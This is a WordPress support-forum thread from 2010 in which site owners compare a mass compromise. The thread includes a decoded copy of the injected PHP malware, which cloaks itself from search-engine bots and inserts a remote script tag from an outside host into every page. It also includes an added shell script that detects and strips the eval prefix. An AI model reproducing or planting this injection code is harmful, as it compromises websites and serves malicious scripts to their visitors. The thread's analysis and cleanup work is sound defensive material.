Support » Fixing WordPress » 2.9.2 site hacked

  • ardvark

    (@ardvark)


    I visited my WP 2.9.2 site today to get a warning about my site having malware associated with it. Looking at the source, I see a script entry in the HTML body going to http://zettapetta.com/js.php

    Looking at the index.php file, I see that the first line has been hacked with an eval command and a lot of garbage that obviously comprises part of the hack. The timestamps of a lot of WP files have been changed, indicating that they were modified sometime yesterday afternoon.

    Anyone else seen this hack yet; is there a fix? I only found one or two mentions of this online, but all my plugins are up to date and I’m not sure how to ensure this won’t happen again after I do a restore from backup on the site.

    Thanks,
    Matt

Viewing 15 replies - 1 through 15 (of 187 total)
    ardvark

    (@ardvark)

    FYI, I don’t have any indication that my hosting password was compromised, since it was very secure and I haven’t seen damage apart from the WP site.

    Daniel Cid

    (@ddsucurinet)

    Hey,

    We are seeing lots of sites hacked with the same code today:

    http://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html

    http://sucuri.net/malware/entry/MW:MROBH:1

    Where is your site being hosted?

    Steve D

    (@steve-d)

    Maybe they should contact this guy. He seems to know what he’s doing.

    http://www.youtube.com/watch?v=nabz7t65eUM

    Daniel Cid

    (@ddsucurinet)

    Steve D: Wow. I am wondering if that has been fixed already.

    But in this latest issue, the sites are not restricted to one hosting provider.

    Emanuele Pisapia

    (@dragoonslair)

    Hello, my sites in WordPress have the same problems…

    All the websites made with WordPress have a strange JS code that prints an iframe…

    How can I fix it…?

    P.S. They are not on Network Solutions

    Daniel Cid

    (@ddsucurinet)

    dragoonslair: Where is your site hosted?

    Check your footer.php, because in one case just this file was hacked. On others, everything was.

    ardvark

    (@ardvark)

    I’m on Dreamhost, and the links above are exactly the issue.
    Also:

    Breaking News: WordPress Hacked with Zettapetta on DreamHost

    mclanea

    (@mclanea)

    I have about 10 sites infected. All hosted on Bluehost.

    Daniel Cid

    (@ddsucurinet)

    Does anyone here that got infected have a site with Apache logging enabled?

    We would love to see the logs if anyone can share.

    mclanea

    (@mclanea)

    I’ve taken all of my sites offline until we can sort this out.

    Will there be a security release from WP?

    Daniel Cid

    (@ddsucurinet)

    No one knows yet how they got in. I am assuming it is not a bug on WordPress itself otherwise the chaos would be much bigger.

    Maybe a plugin, stolen password?

    andrewacomb

    (@andrewacomb)

    All my sites were hacked also.

    Running on GoDaddy servers and running WP 2.9.1

    Every single PHP file on the ENTIRE site has the malicious Base 64 code at the top. Didn’t miss a single PHP file.

    andrewacomb

    (@andrewacomb)

    Here is the Base 64 code “decoded”, well sort of! Interesting, notice the googlebot and yahoo code.

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
        $GLOBALS['mr_no']=1;   // run-once guard so nested includes don't inject twice
        if(!function_exists('mrobh')){
            if(!function_exists('gml')){
                // Returns the injected <script> tag, but hides it from Googlebot and Yahoo
                // user agents (cloaking). The poster swapped the base64 literal for its
                // decoded value here, which is why a script tag sits inside base64_decode().
                function gml(){
                    if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                        return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>");
                    }
                    return "";
                }
            }
            // Polyfill for gzdecode() so gzip-compressed page output can be rewritten.
            // The parameter name was lost in the post (the decoded script tag appeared in
            // its place); it is restored here from the variable the body uses.
            if(!function_exists('gzdecode')){
                function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                    $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));   // gzip FLG byte
                    $RBE4C4D037E939226F65812885A53DAD9=10;   // fixed 10-byte gzip header
                    $RA3D52E52A48936CDE0F5356BB08652F2=0;
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&4){   // FEXTRA: skip the extra field
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                        $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&8){   // FNAME: skip the NUL-terminated name
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&16){   // FCOMMENT: skip the NUL-terminated comment
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&2){   // FHCRC: skip the header CRC
                        $RBE4C4D037E939226F65812885A53DAD9+=2;
                    }
                    $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                    if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;   // not gzip: pass the buffer through unchanged
                    }
                    return $R034AE2AB94F99CC81B389A1822DA3353;
                }
            }
            // Output-buffer callback: drops the Content-Encoding header, decompresses the
            // buffered page and inserts the script tag just before </body>, or appends it
            // when the page has no </body>.
            function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
                Header('Content-Encoding: none');
                $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
                if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                    return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
                }else{
                    return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
                }
            }
            ob_start('mrobh');   // every page render now passes through the callback
        }
    }

    You can see at the bottom where it’s “looking” for the BODY tag.
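    A triage script for the first-line injection described in this post, added here as an example and not taken from the thread or from WordPress: it lists PHP files whose first line carries an eval(base64_decode(...)) prefix, decodes that prefix and checks it for the mr_no/mrobh markers and script hosts seen above, and strips the prefix from a file. It assumes GNU coreutils (base64 -d, mktemp -d) and that the prefix has exactly the form `<?php eval(base64_decode('...')); ?>`; the sample tree and its payload are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): triage the first-line injection
# described above. Assumes GNU coreutils and a prefix of exactly the form
# <?php eval(base64_decode('...')); ?>  (spacing in real variants may differ).

# Print every .php file under $1 whose first line starts with the prefix.
scan_eval_prefix() {
    find "$1" -type f -name '*.php' | while read -r f; do
        if head -n 1 "$f" | grep -q "^<?php eval(base64_decode('"; then
            echo "$f"
        fi
    done
}

# Decode and print the base64 payload carried on the first line of $1
# (prints nothing when the line does not match the prefix).
decode_prefix_payload() {
    head -n 1 "$1" |
        sed -n "s|^<?php eval(base64_decode('\([A-Za-z0-9+/=]*\)')).*|\1|p" |
        base64 -d
}

# Exit 0 when the decoded payload of $1 shows the markers from the post
# (the mr_no guard, the mrobh callback, or the two script hosts).
is_mrobh_payload() {
    decode_prefix_payload "$1" |
        grep -qE "mr_no|mrobh|zettapetta\.com|indesignstudioinfo\.com"
}

# Strip the prefix from $1's first line, keeping the original as $1.bak.
# Diff the result against a known-clean copy afterwards: the thread notes
# many files were touched, and this only undoes the first-line prepend.
strip_eval_prefix() {
    cp "$1" "$1.bak"
    sed "1s|^<?php eval(base64_decode('[A-Za-z0-9+/=]*')); *?>||" "$1.bak" > "$1"
}

# Build a constructed sample tree (two infected files, one clean file) and
# print its path. The payload is a constructed stand-in for the real one.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/t"
    p=$(printf '%s' "if(!isset(\$GLOBALS['mr_no'])){ob_start('mrobh');}" | base64 | tr -d '\n')
    printf '%s\n' "<?php eval(base64_decode('$p')); ?><?php echo 'home';" > "$d/index.php"
    printf '%s\n' "<?php eval(base64_decode('$p')); ?><?php wp_footer(); ?>" > "$d/wp-content/themes/t/footer.php"
    printf '%s\n' "<?php echo 'clean'; // ob_start() used legitimately" > "$d/wp-content/themes/t/header.php"
    echo "$d"
}
```

Run `d=$(make_sample_tree); scan_eval_prefix "$d"` to see the two flagged files; a restore from a known-clean backup is still the safer recovery, as the original poster planned.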

    mclanea

    (@mclanea)

    Other sites I manage on Hostgator and even Bluehost were not affected.

    For now… just killed all of the sites by replacing the index file.

    clundie

    (@clundie)

    This happened to me today, on a site hosted with godaddy, which doesn’t run WordPress and never has.
